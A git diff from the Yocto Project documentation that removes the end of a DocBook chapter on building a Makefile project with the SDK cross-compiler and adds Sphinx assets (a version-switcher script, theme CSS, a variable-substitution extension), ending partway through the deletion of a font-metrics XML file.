-     	 ${CC} main.o module.o -o target_bin
-     main.o: main.c module.h
-	     ${CC} -I . -c main.c
-     module.o: module.c module.h
-	     ${CC} -I . -c module.c
-     clean:
-	     rm -rf *.o
-	     rm target_bin
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Make the Project:</emphasis>
-                    Use the <filename>make</filename> command to create the
-                    binary output file.
-                    Because variables are commented out in the Makefile,
-                    the value used for <filename>CC</filename> is the value
-                    set when the SDK environment setup file was run:
-                    <literallayout class='monospaced'>
-     $ make
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
-                    </literallayout>
-                    From the results of the previous command, you can see that
-                    the compiler used was the compiler established through
-                    the <filename>CC</filename> variable defined in the
-                    setup script.</para>
-
-                    <para>You can override the <filename>CC</filename>
-                    environment variable with the same variable as set from
-                    the Makefile by uncommenting the line in the Makefile
-                    and running <filename>make</filename> again.
-                    <literallayout class='monospaced'>
-     $ make clean
-     rm -rf *.o
-     rm target_bin
-     #
-     # Edit the Makefile by uncommenting the line that sets CC to "gcc"
-     #
-     $ make
-     gcc -I . -c main.c
-     gcc -I . -c module.c
-     gcc main.o module.o -o target_bin
-                    </literallayout>
-                    As shown in the previous example, the cross-toolchain
-                    compiler is not used.
-                    Rather, the default compiler is used.</para>
-
-                    <para>This next case shows how to override a variable
-                    by providing the variable as part of the command line.
-                    Go into the Makefile and re-insert the comment character
-                    so that running <filename>make</filename> uses
-                    the established SDK compiler.
-                    However, when you run <filename>make</filename>, use a
-                    command-line argument to set <filename>CC</filename>
-                    to "gcc":
-                    <literallayout class='monospaced'>
-     $ make clean
-     rm -rf *.o
-     rm target_bin
-     #
-     # Edit the Makefile to comment out the line setting CC to "gcc"
-     #
-     $ make
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
-     $ make clean
-     rm -rf *.o
-     rm target_bin
-     $ make CC="gcc"
-     gcc -I . -c main.c
-     gcc -I . -c module.c
-     gcc main.o module.o -o target_bin
-                    </literallayout>
-                    In the previous case, the command-line argument overrides
-                    the SDK environment variable.</para>
-
-                    <para>In this last case, edit Makefile again to use the
-                    "gcc" compiler but then use the "-e" option on the
-                    <filename>make</filename> command line:
-                    <literallayout class='monospaced'>
-     $ make clean
-     rm -rf *.o
-     rm target_bin
-     #
-     # Edit the Makefile to use "gcc"
-     #
-     $ make
-     gcc -I . -c main.c
-     gcc -I . -c module.c
-     gcc main.o module.o -o target_bin
-     $ make clean
-     rm -rf *.o
-     rm target_bin
-     $ make -e
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
-                    </literallayout>
-                    In the previous case, the "-e" option forces
-                    <filename>make</filename> to use the SDK environment
-                    variables regardless of the values in the Makefile.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Execute Your Project:</emphasis>
-                    To execute the project (i.e.
-                    <filename>target_bin</filename>), use the following
-                    command:
-                    <literallayout class='monospaced'>
-     $ ./target_bin
-     Hello World!
-                    </literallayout>
-                    <note>
-                        If you used the cross-toolchain compiler to build
-                        <filename>target_bin</filename> and your build host
-                        differs in architecture from that of the target
-                        machine, you need to run your project on the target
-                        device.
-                    </note>
-                    As expected, the project displays the "Hello World!"
-                    message.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg b/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg
new file mode 100644
index 0000000000..8ab47d49f7
--- /dev/null
+++ b/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg
diff --git a/documentation/sphinx-static/switchers.js b/documentation/sphinx-static/switchers.js
new file mode 100644
index 0000000000..1d65fa7fae
--- /dev/null
+++ b/documentation/sphinx-static/switchers.js
@@ -0,0 +1,236 @@
+(function() {
+  'use strict';
+
+  var all_versions = {
+    'dev': 'dev (3.5)',
+    '3.4.1': '3.4.1',
+    '3.3.4': '3.3.4',
+    '3.2.4': '3.2.4',
+    '3.1.14': '3.1.14',
+    '3.0.4': '3.0.4',
+    '2.7.4': '2.7.4',
+  };
+
+  var all_doctypes = {
+      'single': 'Individual Webpages',
+      'mega': "All-in-one 'Mega' Manual",
+  };
+
+  // Simple version comparision
+  // Return 1 if a > b
+  // Return -1 if a < b
+  // Return 0 if a == b
+  function ver_compare(a, b) {
+    if (a == "dev") {
+       return 1;
+    }
+
+    if (a === b) {
+       return 0;
+    }
+
+    var a_components = a.split(".");
+    var b_components = b.split(".");
+
+    var len = Math.min(a_components.length, b_components.length);
+
+    // loop while the components are equal
+    for (var i = 0; i < len; i++) {
+        // A bigger than B
+        if (parseInt(a_components[i]) > parseInt(b_components[i])) {
+            return 1;
+        }
+
+        // B bigger than A
+        if (parseInt(a_components[i]) < parseInt(b_components[i])) {
+            return -1;
+        }
+    }
+
+    // If one's a prefix of the other, the longer one is greater.
+    if (a_components.length > b_components.length) {
+        return 1;
+    }
+
+    if (a_components.length < b_components.length) {
+        return -1;
+    }
+
+    // Otherwise they are the same.
+    return 0;
+  }
+
+  function build_version_select(current_series, current_version) {
+    var buf = ['<select>'];
+
+    $.each(all_versions, function(version, title) {
+      var series = version.substr(0, 3);
+      if (series == current_series) {
+        if (version == current_version)
+            buf.push('<option value="' + version + '" selected="selected">' + title + '</option>');
+        else
+            buf.push('<option value="' + version + '">' + title + '</option>');
+
+        if (version != current_version)
+            buf.push('<option value="' + current_version + '" selected="selected">' + current_version + '</option>');
+      } else {
+        buf.push('<option value="' + version + '">' + title + '</option>');
+      }
+    });
+
+    buf.push('</select>');
+    return buf.join('');
+  }
+
+  function build_doctype_select(current_doctype) {
+    var buf = ['<select>'];
+
+    $.each(all_doctypes, function(doctype, title) {
+      if (doctype == current_doctype)
+        buf.push('<option value="' + doctype + '" selected="selected">' +
+                 all_doctypes[current_doctype] + '</option>');
+      else
+        buf.push('<option value="' + doctype + '">' + title + '</option>');
+    });
+    if (!(current_doctype in all_doctypes)) {
+        // In case we're browsing a doctype that is not yet in all_doctypes.
+        buf.push('<option value="' + current_doctype + '" selected="selected">' +
+                 current_doctype + '</option>');
+        all_doctypes[current_doctype] = current_doctype;
+    }
+    buf.push('</select>');
+    return buf.join('');
+  }
+
+  function navigate_to_first_existing(urls) {
+    // Navigate to the first existing URL in urls.
+    var url = urls.shift();
+
+    // Web browsers won't redirect file:// urls to file urls using ajax but
+    // its useful for local testing
+    if (url.startsWith("file://")) {
+      window.location.href = url;
+      return;
+    }
+
+    if (urls.length == 0) {
+      window.location.href = url;
+      return;
+    }
+    $.ajax({
+      url: url,
+      success: function() {
+        window.location.href = url;
+      },
+      error: function() {
+        navigate_to_first_existing(urls);
+      }
+    });
+  }
+
+  function get_docroot_url() {
+    var url = window.location.href;
+    var root = DOCUMENTATION_OPTIONS.URL_ROOT;
+
+    var urlarray = url.split('/');
+    // Trim off anything after '/'
+    urlarray.pop();
+    var depth = (root.match(/\.\.\//g) || []).length;
+    for (var i = 0; i < depth; i++) {
+      urlarray.pop();
+    }
+
+    return urlarray.join('/') + '/';
+  }
+
+  function on_version_switch() {
+    var selected_version = $(this).children('option:selected').attr('value');
+    var url = window.location.href;
+    var current_version = DOCUMENTATION_OPTIONS.VERSION;
+    var docroot = get_docroot_url()
+
+    var new_versionpath = selected_version + '/';
+    if (selected_version == "dev")
+        new_versionpath = '';
+
+    // dev versions have no version prefix
+    if (current_version == "dev") {
+        var new_url = docroot + new_versionpath + url.replace(docroot, "");
+        var fallback_url = docroot + new_versionpath;
+    } else {
+        var new_url = url.replace('/' + current_version + '/', '/' + new_versionpath);
+        var fallback_url = new_url.replace(url.replace(docroot, ""), "");
+    }
+
+    console.log(get_docroot_url())
+    console.log(url + " to url " + new_url);
+    console.log(url + " to fallback " + fallback_url);
+
+    if (new_url != url) {
+      navigate_to_first_existing([
+        new_url,
+        fallback_url,
+        'https://www.yoctoproject.org/docs/',
+      ]);
+    }
+  }
+
+  function on_doctype_switch() {
+    var selected_doctype = $(this).children('option:selected').attr('value');
+    var url = window.location.href;
+    if (selected_doctype == 'mega') {
+      var docroot = get_docroot_url()
+      var current_version = DOCUMENTATION_OPTIONS.VERSION;
+      // Assume manuals before 3.2 are using old docbook mega-manual
+      if (ver_compare(current_version, "3.2") < 0) {
+        var new_url = docroot + "mega-manual/mega-manual.html";
+      } else {
+        var new_url = docroot + "singleindex.html";
+      }
+    } else {
+      var new_url = url.replace("singleindex.html", "index.html")
+    }
+
+    if (new_url != url) {
+      navigate_to_first_existing([
+        new_url,
+        'https://www.yoctoproject.org/docs/',
+      ]);
+    }
+  }
+
+  // Returns the current doctype based upon the url
+  function doctype_segment_from_url(url) {
+    if (url.includes("singleindex") || url.includes("mega-manual"))
+      return "mega";
+    return "single";
+  }
+
+  $(document).ready(function() {
+    var release = DOCUMENTATION_OPTIONS.VERSION;
+    var current_doctype = doctype_segment_from_url(window.location.href);
+    var current_series = release.substr(0, 3);
+    var version_select = build_version_select(current_series, release);
+
+    $('.version_switcher_placeholder').html(version_select);
+    $('.version_switcher_placeholder select').bind('change', on_version_switch);
+
+    var doctype_select = build_doctype_select(current_doctype);
+
+    $('.doctype_switcher_placeholder').html(doctype_select);
+    $('.doctype_switcher_placeholder select').bind('change', on_doctype_switch);
+
+    if (ver_compare(release, "3.1") < 0) {
+      $('#outdated-warning').html('Version ' + release + ' of the project is now considered obsolete, please select and use a more recent version');
+      $('#outdated-warning').css('padding', '.5em');
+    } else if (release != "dev") {
+      $.each(all_versions, function(version, title) {
+        var series = version.substr(0, 3);
+        if (series == current_series && version != release) {
+          $('#outdated-warning').html('This document is for outdated version ' + release + ', you should select the latest release version in this series, ' + version + '.');
+          $('#outdated-warning').css('padding', '.5em');
+        }
+      });
+    }
+  });
+})();
diff --git a/documentation/sphinx-static/theme_overrides.css b/documentation/sphinx-static/theme_overrides.css
new file mode 100644
index 0000000000..d235cb826f
--- /dev/null
+++ b/documentation/sphinx-static/theme_overrides.css
@@ -0,0 +1,164 @@
+/*
+    SPDX-License-Identifier: CC-BY-SA-2.0-UK
+*/
+
+body {
+  font-family: Verdana, Sans, sans-serif;
+  margin:  0em auto;
+  color: #333;
+}
+
+h1,h2,h3,h4,h5,h6,h7 {
+  font-family: Arial, Sans;
+  color: #00557D;
+  clear: both;
+}
+
+h1 {
+  font-size: 2em;
+  text-align: left;
+  padding: 0em 0em 0em 0em;
+  margin: 2em 0em 0em 0em;
+}
+
+h2.subtitle {
+  margin: 0.10em 0em 3.0em 0em;
+  padding: 0em 0em 0em 0em;
+  font-size: 1.8em;
+  padding-left: 20%;
+  font-weight: normal;
+  font-style: italic;
+}
+
+h2 {
+  margin: 2em 0em 0.66em 0em;
+  padding: 0.5em 0em 0em 0em;
+  font-size: 1.5em;
+  font-weight: bold;
+}
+
+h3.subtitle {
+  margin: 0em 0em 1em 0em;
+  padding: 0em 0em 0em 0em;
+  font-size: 142.14%;
+  text-align: right;
+}
+
+h3 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 140%;
+  font-weight: bold;
+}
+
+h4 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 120%;
+  font-weight: bold;
+}
+
+h5 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 110%;
+  font-weight: bold;
+}
+
+h6 {
+  margin: 1em 0em 0em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 110%;
+  font-weight: bold;
+}
+
+em {
+  font-weight: bold;
+}
+
+.pre {
+  font-size: medium;
+  font-family: Courier, monospace;
+}
+
+.wy-nav-content a {
+  text-decoration: underline;
+  color: #444;
+  background: transparent;
+}
+
+.wy-nav-content a:hover {
+  text-decoration: underline;
+  background-color: #dedede;
+}
+
+.wy-nav-content a:visited {
+  color: #444;
+}
+
+[alt='Permalink'] { color: #eee; }
+[alt='Permalink']:hover { color: black; }
+
+@media screen {
+    /* content column
+     *
+     * RTD theme's default is 800px as max width for the content, but we have
+     * tables with tons of columns, which need the full width of the view-port.
+     */
+
+    .wy-nav-content{max-width: none; }
+
+    /* inline literal: drop the borderbox, padding and red color */
+    code, .rst-content tt, .rst-content code {
+        color: inherit;
+        border: none;
+        padding: unset;
+        background: inherit;
+        font-size: 85%;
+    }
+
+    .rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal {
+        color: inherit;
+    }
+
+    /* Admonition should be gray, not blue or green */
+    .rst-content .note .admonition-title,
+    .rst-content .tip .admonition-title,
+    .rst-content .warning .admonition-title,
+    .rst-content .caution .admonition-title,
+    .rst-content .admonition-tying-it-together .admonition-title,
+    .rst-content .important .admonition-title {
+        background: #f0f0f2;
+        color: #00557D;
+
+    }
+
+    .rst-content .note,
+    .rst-content .tip,
+    .rst-content .important,
+    .rst-content .warning,
+    .rst-content .admonition-tying-it-together,
+    .rst-content .caution  {
+        background: #f0f0f2;
+    }
+
+    /* Remove the icon in front of note/tip element, and before the logo */
+    .icon-home:before, .rst-content .admonition-title:before {
+        display: none
+    }
+
+    /* a custom informalexample container is used in some doc */
+    .informalexample {
+        border: 1px solid;
+        border-color: #aaa;
+        margin: 1em 0em;
+        padding: 1em;
+        page-break-inside: avoid;
+    }
+
+    /* Remove the blue background in the top left corner, around the logo */
+    .wy-side-nav-search {
+        background: inherit;
+    }
+
+}
diff --git a/documentation/sphinx/yocto-vars.py b/documentation/sphinx/yocto-vars.py
new file mode 100644
index 0000000000..8795eee0a0
--- /dev/null
+++ b/documentation/sphinx/yocto-vars.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+from hashlib import md5
+from pathlib import Path
+import re
+import sys
+
+import sphinx
+from sphinx.application import Sphinx
+
+# This extension uses pyyaml, report an explicit
+# error message if it's not installed
+try:
+    import yaml
+except ImportError:
+    sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
+    \nPlease make sure to install pyyaml python package.\n")
+    sys.exit(1)
+
+__version__  = '1.0'
+
+# Variables substitutions. Uses {VAR} subst using variables defined in poky.yaml
+# Each .rst file is processed after source-read event (subst_vars_replace runs once per file)
+subst_vars = {}
+
+poky_hash = ""
+
+def subst_vars_replace(app: Sphinx, docname, source):
+    result = source[0]
+    for k in subst_vars:
+        result = result.replace("&"+k+";", subst_vars[k])
+    source[0] = result
+
+def yocto_vars_env_get_outdated(app: Sphinx, env, added, changed, removed):
+    '''
+    If poky.yaml changed (BUILDDIR/.poky.yaml.cache does not exist or contains
+    an md5sum different from poky.yaml's current md5sum), force rebuild of all
+    *.rst files in SOURCEDIR whose content has at least one occurence of `&.*;`
+    (see PATTERN global variable).
+    '''
+    try:
+        poky_cache = Path(app.outdir) / ".poky.yaml.cache"
+        cache_hash = poky_cache.read_text()
+    except FileNotFoundError:
+        cache_hash = None
+
+    if poky_hash == cache_hash:
+        return []
+
+    docs = []
+    for p in Path(app.srcdir).rglob("*.rst"):
+        if PATTERN.search(p.read_text()):
+            p_rel_no_ext = p.relative_to(app.srcdir).parent / p.stem
+            docs.append(str(p_rel_no_ext))
+    return docs
+
+def yocto_vars_build_finished(app: Sphinx, exception):
+    poky_cache = Path(app.outdir) / ".poky.yaml.cache"
+    poky_cache.write_text(poky_hash)
+    return []
+
+PATTERN = re.compile(r'&(.*?);')
+def expand(val, src):
+    return PATTERN.sub(lambda m: expand(src.get(m.group(1), ''), src), val)
+
+def setup(app: Sphinx):
+    global poky_hash
+
+    with open("poky.yaml") as file:
+        hasher = md5()
+        buff = file.read()
+        hasher.update(buff.encode('utf-8'))
+        poky_hash = hasher.hexdigest()
+        subst_vars.update(yaml.safe_load(buff))
+
+    for k in subst_vars:
+        subst_vars[k] = expand(subst_vars[k], subst_vars)
+
+    app.connect('source-read', subst_vars_replace)
+    app.connect('env-get-outdated', yocto_vars_env_get_outdated)
+    app.connect('build-finished', yocto_vars_build_finished)
+
+    return dict(
+        version = __version__,
+        parallel_read_safe = True,
+        parallel_write_safe = True
+    )
diff --git a/documentation/template/Vera.xml b/documentation/template/Vera.xml
deleted file mode 100644
index 3c82043e35..0000000000
--- a/documentation/template/Vera.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics type="TYPE0"><font-name>BitstreamVeraSans</font-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>928</ascender><descender>-235</descender><bbox><left>-183</left><bottom>-235</bottom><right>1287</right><top>928</top></bbox><flags>32</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="600"/><wx w="0"/><wx w="317"/><wx w="317"/><wx w="400"/><wx w="459"/><wx w="837"/><wx w="636"/><wx w="950"/><wx w="779"/><wx w="274"/><wx w="390"/><wx w="390"/><wx w="500"/><wx w="837"/><wx w="317"/><wx w="360"/><wx w="317"/><wx w="336"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="336"/><wx w="336"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="530"/><wx w="1000"/><wx w="684"/><wx w="686"/><wx w="698"/><wx w="770"/><wx w="631"/><wx w="575"/><wx w="774"/><wx w="751"/><wx w="294"/><wx w="294"/><wx w="655"/><wx w="557"/><wx w="862"/><wx w="748"/><wx w="787"/><wx w="603"/><wx w="787"/><wx w="694"/><wx w="634"/><wx w="610"/><wx w="731"/><wx w="684"/><wx w="988"/><wx w="685"/><wx w="610"/><wx w="685"/><wx w="390"/><wx w="336"/><wx w="390"/><wx w="837"/><wx w="500"/><wx w="500"/><wx w="612"/><wx w="634"/><wx w="549"/><wx w="634"/><wx w="615"/><wx w="352"/><wx w="634"/><wx w="633"/><wx w="277"/><wx w="277"/><wx w="579"/><wx w="277"/><wx w="974"/><wx w="633"/><wx w="611"/><wx w="634"/><wx w="634"/><wx w="411"/><wx w="520"/><wx w="392"/><wx w="633"/><wx w="591"/><wx w="817"/><wx w="591"/><wx w="591"/><wx w="524"/><wx w="636"/><wx w="336"/><wx w="636"/><wx w="837"/><wx w="684"/><wx w="684"/><wx w="698"/><wx w="631"/><wx w="748"/><wx w="787"/><wx w="731"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="549"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="633"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="500"/><wx w="500"/><wx w="636"/><wx w="636"/><wx w="500"/><wx w="589"/><wx w="636"/><wx w="629"/><wx w="1000"/><wx w="1000"/><wx w="1000"/><wx w="500"/><wx w="500"/><wx w="837"/><wx w="974"/><wx w="787"/><wx w="833"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="636"/><wx w="636"/><wx w="517"/><wx w="673"/><wx w="756"/><wx w="588"/><wx w="520"/><wx w="471"/><wx w="471"/><wx w="764"/><wx w="981"/><wx w="611"/><wx w="530"/><wx w="400"/><wx w="837"/><wx w="637"/><wx w="636"/><wx w="837"/><wx w="668"/><wx w="611"/><wx w="611"/><wx w="1000"/><wx w="636"/><wx w="684"/><wx w="684"/><wx w="787"/><wx w="1069"/><wx w="1022"/><wx w="500"/><wx w="1000"/><wx w="518"/><wx w="518"/><wx w="317"/><wx w="317"/><wx w="837"/><wx w="494"/><wx w="591"/><wx w="610"/><wx w="166"/><wx w="636"/><wx w="399"/><wx w="399"/><wx w="629"/><wx w="629"/><wx w="500"/><wx w="317"/><wx w="317"/><wx w="518"/><wx w="1341"/><wx w="684"/><wx w="631"/><wx w="684"/><wx w="631"/><wx w="631"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="787"/><wx w="787"/><wx w="787"/><wx w="731"/><wx w="731"/><wx w="731"/><wx w="277"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="562"/><wx w="284"/><wx w="634"/><wx w="520"/><wx w="685"/><wx w="524"/><wx w="336"/><wx w="774"/><wx w="611"/><wx w="610"/><wx w="591"/><wx w="604"/><wx w="634"/><wx w="837"/><wx w="837"/><wx w="400"/><wx w="400"/><wx w="400"/><wx w="969"/><wx w="969"/><wx w="969"/><wx w="774"/><wx w="634"/><wx w="294"/><wx w="634"/><wx w="520"/><wx w="698"/><wx w="549"/><wx w="698"/><wx w="549"/><wx w="634"/><wx w="360"/><wx w="317"/><wx w="636"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="400"/><wx w="500"/><wx w="500"/></cid-widths></multibyte-extras><kerning kpx1="246"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="235"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="43"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-35" kpx2="197"/><pair kern="-30" kpx2="181"/></kerning><kerning kpx1="16"><pair kern="36" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-21" kpx2="199"/><pair kern="18" kpx2="123"/><pair kern="27" kpx2="208"/><pair kern="-118" kpx2="187"/><pair kern="-49" kpx2="59"/><pair kern="18" kpx2="124"/><pair kern="-21" kpx2="201"/><pair kern="-118" kpx2="60"/><pair kern="36" kpx2="52"/><pair kern="18" kpx2="125"/><pair kern="36" kpx2="42"/><pair kern="-118" kpx2="234"/><pair kern="18" kpx2="122"/><pair kern="27" kpx2="210"/><pair kern="-21" kpx2="36"/><pair kern="18" kpx2="82"/><pair kern="-40" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="27" kpx2="175"/><pair kern="27" kpx2="50"/><pair kern="27" kpx2="209"/><pair kern="27" kpx2="103"/><pair kern="-21" kpx2="98"/><pair kern="55" kpx2="45"/><pair kern="-21" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-26" kpx2="89"/><pair kern="18" kpx2="121"/><pair kern="-58" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-21" 